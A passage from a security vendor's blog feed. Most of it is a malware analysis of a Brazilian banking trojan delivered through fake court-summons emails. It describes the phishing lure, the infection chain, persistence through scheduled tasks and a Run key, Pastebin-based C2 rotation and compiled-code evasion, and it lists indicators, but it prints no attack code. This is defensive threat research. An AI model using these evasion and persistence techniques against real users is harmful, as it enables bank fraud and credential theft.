<p>Instead of relying on reputation-based signals or waiting for a high-confidence malware alert, security teams can prove when trusted tools are being abused. That gives CISOs stronger confidence in detection coverage, faster response readiness, and better visibility into whether approved remote access software is creating hidden business risk.&nbsp;</p>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.</p>



<p>ANY.RUN solutions include <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams analyze suspicious files and URLs, uncover attacker behavior, enrich investigations with real-world threat context, and operationalize intelligence across their environment.</p>



<p>Built for security-conscious organizations, ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II</a> attested and supports enterprise-ready controls such as SSO, MFA, granular privacy settings, and AES-256-CBC encryption.</p>



<p>Trusted by more than <strong>15,000 organizations</strong> and <strong>600,000 security professionals worldwide</strong>, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/">Phishing-to-RMM Attacks: The Remote Access Blind Spot CISOs Can’t Ignore </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Inside agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time </title>
		<link>https://any.run/cybersecurity-blog/brazilian-banking-phishing-campaign/</link>
					<comments>https://any.run/cybersecurity-blog/brazilian-banking-phishing-campaign/#respond</comments>
		
		<dc:creator><![CDATA[Moises Cerqueira (0xOlympus)]]></dc:creator>
		<pubDate>Fri, 24 Apr 2026 11:02:39 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[brazil]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[cybersecurity training]]></category>
		<category><![CDATA[finance]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20342</guid>

					<description><![CDATA[<p>Editor’s note:&#160;The analysis is authored by Moises Cerqueira, malware researcher &#38; threat hunter. You can&#160;find Moises on LinkedIn and X. A new phishing campaign targeting Brazilian users&#160;demonstrates&#160;how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons,&#160;this campaign leverages social engineering, multi-stage malware delivery, and real-time [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/brazilian-banking-phishing-campaign/">Inside agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><em><strong>Editor’s note:</strong></em><em style=""><b>&nbsp;The analysis is authored by Moises Cerqueira, </b></em><strong><em>malware researcher &amp; threat hunter. You can&nbsp;find Moises on <a href="https://www.linkedin.com/in/moises-cerqueira/">LinkedIn</a> and <a href="https://x.com/0x_Olympus">X</a>.</em></strong></p>



<p>A new phishing campaign targeting Brazilian users&nbsp;demonstrates&nbsp;how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons,&nbsp;this campaign leverages social engineering, multi-stage malware delivery, and real-time remote access capabilities&nbsp;<strong>to compromise victims and actively&nbsp;assist&nbsp;attackers in financial theft.&nbsp;</strong>&nbsp;</p>



<p>For organizations, the implications extend beyond individual users.&nbsp;<strong>Employees accessing corporate systems, financial platforms, or crypto wallets from infected endpoints can unintentionally expose business-critical assets</strong>. The malware’s ability to stream&nbsp;screens,&nbsp;execute commands, and harvest credentials in real time makes it particularly dangerous for finance teams, executives, and organizations&nbsp;operating&nbsp;in or with Brazil.&nbsp;</p>



<p>This is not just phishing.&nbsp;It’s&nbsp;a live intrusion channel into financial workflows.&nbsp;Technical analysis&nbsp;below.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">Attack Overview&nbsp;</h2>



<p>The malware at the heart of this campaign, agenteV2, functions as a full interactive backdoor. Once installed,&nbsp;<strong>it streams the&nbsp;victim&#8217;s&nbsp;screen to the attacker in real time, enabling live, operator-assisted financial fraud</strong>. A human operator watches the victim&#8217;s desktop session as it happens, waiting for a banking portal to open, and then takes direct control.&nbsp;</p>



<p>The malware targets credentials and sessions at seven&nbsp;<strong>major Brazilian financial institutions</strong>&nbsp;— Itaú, Banco do&nbsp;Brasil, Caixa Econômica Federal, Bradesco, Santander, Inter, and Stone — as well as&nbsp;<strong>five major cryptocurrency wallet extensions</strong>. It also probes host systems for the presence of specialized Brazilian anti-fraud software (Diebold Warsaw,&nbsp;GbPlugin),&nbsp;indicating&nbsp;deliberate, well-researched targeting of the Brazilian financial ecosystem.&nbsp;</p>



<h2 class="wp-block-heading">Executive Summary&nbsp;</h2>



<p><strong>1. This Is Live Financial Fraud, Not Passive Credential Theft.</strong>&nbsp;</p>



<p><strong>Business perspective</strong>: agenteV2 establishes a persistent WebSocket backdoor with live screen streaming and a remote shell. The attacker watches the victim&#8217;s screen in real time and acts manually the moment a banking session opens. Financial losses can occur within minutes of&nbsp;infection,&nbsp;before&nbsp;any traditional alert fires.&nbsp;</p>



<p>Deploy ANY.RUN <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> to detonate suspicious email attachments in a live, controlled environment before they reach employee inboxes. </p>



<p><strong>2.&nbsp;The Lure Is Convincing Enough to Fool Security-Aware Staff.</strong>&nbsp;</p>



<p><strong>Business perspective:</strong>&nbsp;The phishing email impersonates a Brazilian federal court using a case number format indistinguishable from authentic CNJ court references. Even employees trained to spot phishing are likely to treat a realistic judicial summons as a high-priority&nbsp;communication requiring immediate action.&nbsp;</p>



<p>Use ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence&nbsp;Lookup</a>&nbsp;to check suspicious email sender domains, embedded URLs, and attachment hashes instantly against a continuously updated threat intelligence database. A 10-second lookup is sufficient to surface this&nbsp;campaign&#8217;s&nbsp;known indicators.&nbsp;</p>



<p><strong>3.&nbsp;The Malware&nbsp;Survives Reboots, IT Maintenance, and Password Resets.</strong>&nbsp;</p>



<p><strong>Business perspective</strong>: Three separate persistence mechanisms — two Scheduled Tasks at maximum privilege and a Registry Run key — ensure the malware&nbsp;remains&nbsp;operational across reboots, routine IT maintenance, and even password changes.&nbsp;&nbsp;</p>



<p>ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence&nbsp;Feeds</a>&nbsp;deliver structured IOCs&nbsp;directly into your SIEM and EDR for automated hunting across your entire endpoint fleet. Any host matching these indicators should be treated as actively compromised and isolated&nbsp;immediately.&nbsp;</p>



<p><strong>4. Blocking the Known C2 IP Is Not Enough.</strong>&nbsp;</p>



<p><strong>Business perspective:</strong>&nbsp;The malware reads its command-and-control server address from a public Pastebin page. The attacker can silently rotate to a new IP by editing a single page — without redeploying, recompiling, or redelivering any malware. IP blocklists become stale within hours of a C2 rotation.&nbsp;</p>



<p>Replace IP-based blocking with behavior-based detection. The agenteV2 TLS client fingerprint (JA3&nbsp;hash))&nbsp;is stable across infrastructure rotations and can be deployed as a detection rule in your IDS/NDR/EDR.&nbsp;</p>



<p><strong>5.&nbsp;Traditional AV Will Not Catch This:&nbsp;Behavioral Analysis Is Required.</strong>&nbsp;</p>



<p><strong>Business perspective:&nbsp;</strong>The core stealer DLL is compiled from Python to native machine code with&nbsp;Nuitka&nbsp;— no bytecode is&nbsp;extractable&nbsp;and standard&nbsp;decompilers&nbsp;do not apply. Files are disguised with legitimate names (wifi_driver.exe, msedge04.exe) and the payload executes entirely in memory before touching&nbsp;disk.&nbsp;&nbsp;</p>



<p>Behavioral sandbox analysis is the only reliable pre-execution detection method for&nbsp;Nuitka-compiled threats. The YARA rule in this report (Win_Stealer_AgenteV2_Nuitka) is deployable via&nbsp;<a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">ANY.RUN TI infrastructure</a>&nbsp;for automated variant detection.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-291"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="291"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014 wpdt-valign-middle wpdt-align-center"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:22.337278106509%;                    padding:10px;
                    "
                    >
                                        Impact Area                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014 wpdt-valign-middle wpdt-align-center"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:77.662721893491%;                    padding:10px;
                    "
                    >
                                        Assessment                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Financial Impact                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Real-time operator-assisted fraud + credential theft targeting major Brazilian banks and crypto wallets                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Scope                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Brazilian users judicial lure suggests broad targeting, not spearphishing                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Triple persistence (Registry Run + two Scheduled Tasks /rl highest)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        C2 Resilience                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Pastebin dead-drop resolver enables rapid IP rotation without redeployment                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Detection Difficulty                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Nuitka-compiled DLL, Cloudflare proxy, legitimate-looking filenames, WebSocket C2 channel                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        RE Difficulty                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Core DLL compiled to native code (Nuitka); no extractable bytecode; ~90% Nuitka boilerplate                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Threat Classification                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Interactive Banking Trojan + Infostealer persistent WebSocket backdoor with live screen streaming and remote shell                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-291'>
table#wpdtSimpleTable-291{ table-layout: fixed !important; }
table#wpdtSimpleTable-291 td, table.wpdtSimpleTable291 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<br>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Make faster security decisions with live threat context.<br>
<span class="highlight">Prevent financial loss and business disruption.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=brazilian-banking-phishing-campaign&#038;utm_term=240426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Detailed Technical Analysis&nbsp;</h2>



<p>This attack was fully analyzed in ANY.RUN&#8217;s Interactive Sandbox, which provided full visibility into the multi-stage infection chain, process trees, network connections, API traces, and registry modifications in a live, controllable Windows 11 environment.&nbsp;</p>



<p><a href="https://app.any.run/tasks/15fe8dd6-3ae1-4b34-aec4-2540570c6d4a/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View&nbsp;the phishing analysis session</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-1024x578.png" alt="" class="wp-image-20362" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-1536x867.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_0.png 1850w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full&nbsp;attack&nbsp;chain&nbsp;analysis&nbsp;in&nbsp;the&nbsp;sandbox</em></figcaption></figure>



<p>The threat actor&nbsp;operates&nbsp;a well-structured infrastructure spanning phishing delivery, staged payload distribution, a Pastebin-based dead-drop resolver, and a dedicated C2 server hosted on a bulletproof VPS provider in Germany.&nbsp;</p>



<p>The final payload, internally named agenteV2, is a Python-based interactive Banking&nbsp;<a href="https://any.run/malware-trends/trojan/" target="_blank" rel="noreferrer noopener">Trojan&nbsp;</a>and Information&nbsp;<a href="https://any.run/malware-trends/stealer/" target="_blank" rel="noreferrer noopener">Stealer</a>&nbsp;whose core logic (agenteV2_historico_detect.dll) is compiled with&nbsp;Nuitka&nbsp;into native machine code.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close blind spots and <span class="highlight">reduce breach risks in your company</span>.<br>
Integrate ANY.RUN’s sandbox for early threat detection.<br></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=brazilian-banking-phishing-campaign&#038;utm_term=240426&#038;utm_content=linktoregistration#register" rel="noopener" target="_blank">
Register now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>It is not a passive fire-and-forget stealer — it&nbsp;establishes&nbsp;a persistent WebSocket backdoor (uws://) enabling live screen streaming (PIL +&nbsp;mss), an interactive remote shell (subprocess.Popen&nbsp;dispatched via&nbsp;CMD:SHELL: parsing), and real-time operator control over the victim session. Persistence is achieved via Registry Run key and Scheduled Tasks (/rl&nbsp;highest), and a Pastebin dead-drop resolver enables rapid C2 rotation without redeployment.&nbsp;</p>



<h3 class="wp-block-heading">1.&nbsp;Initial Artifact Analysis&nbsp;</h3>



<h4 class="wp-block-heading"><em>1.1&nbsp;Email lure (.eml)</em>&nbsp;</h4>



<p>The campaign is delivered via email impersonating an official judicial summons from the Tribunal de Justiça do Distrito Federal (TJDF), referencing a fabricated civil conciliation hearing (case number 2194839-33.2026.8.07.1876). The case number format matches the authentic Brazilian CNJ numbering standard, increasing credibility.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="648" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-1024x648.png" alt="" class="wp-image-20368" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-1024x648.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-300x190.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-768x486.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-370x234.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-270x171.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1-740x468.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_1.png 1463w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing&nbsp;email: PDF&nbsp;with&nbsp;password&nbsp;prompt&nbsp;and&nbsp;fake&nbsp;error&nbsp;message&nbsp;with&nbsp;download&nbsp;link&nbsp;for&nbsp;VBS</em></figcaption></figure>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-292"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="292"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000015"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:16.834532374101%;                    padding:10px;
                    "
                    >
                                        Property                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000015"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:83.165467625899%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Filename                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        INTIMACAO JUDICIAL - Designacao de Conciliacao - Diegovolt - 2194839-33.2026.8.07.1876.eml                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        MIME Type                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        message/rfc822 (SMTP mail, ASCII text, CRLF line terminators)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        MD5                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        285fea57345d838916153c4d8f43ab6c                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        SHA1                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        8a87d63110eeb782bb621b5f3154ca80bdcf5de7                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        SHA256                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        5fd682cdfdf2de867be2a4bd378a2c206370c18a598975a11c99dba121e36b1b                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        ssdeep                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        768:1wxIS5yHtOJ3GsP80Nbt0m0mxGQd5fiCJxXFAwYNBYT:KkHtbo5+mxbnVr                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bold wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        ANY.RUN Tags                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        attachments, attc-pdf, blind-copy, pastebin, python, nuitka, loader                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-292'>
table#wpdtSimpleTable-292{ table-layout: fixed !important; }
table#wpdtSimpleTable-292 td, table.wpdtSimpleTable292 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000015 { font-size: 15px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h4 class="wp-block-heading"><em>1.2 Social Engineering Mechanism</em>&nbsp;</h4>



<p>The PDF attachment requires a password to open a technique to bypass email gateway sandboxes that cannot interact with password-protected documents. Upon &#8216;failing&#8217; to open, the PDF instructs the victim to download a VBS file via a &#8216;click here&#8217; link, attributing the error to a missing software&nbsp;component. This two-step friction is deliberate: it filters unengaged recipients and increases commitment of those who&nbsp;proceed.&nbsp;</p>



<h3 class="wp-block-heading">2.&nbsp;Infection&nbsp;Chain&nbsp;</h3>



<p>The full process tree&nbsp;and&nbsp;infection chain graph&nbsp;are visible in the sandbox detonation: WScript.exe → cmd.exe →&nbsp;schtasks&nbsp;+ wifi_driver.exe execution flow:&nbsp;&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="741" height="815" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_2.png" alt="" class="wp-image-20376" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_2.png 741w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_2-273x300.png 273w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_2-370x407.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_2-270x297.png 270w" sizes="(max-width: 741px) 100vw, 741px" /><figcaption class="wp-element-caption"><em>Malware process tree in the sandbox analysis</em></figcaption></figure>



<p>The processes include malware delivery, payload delivery, persistence establishment, and more:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-293"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="12"
           data-wpID="293"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
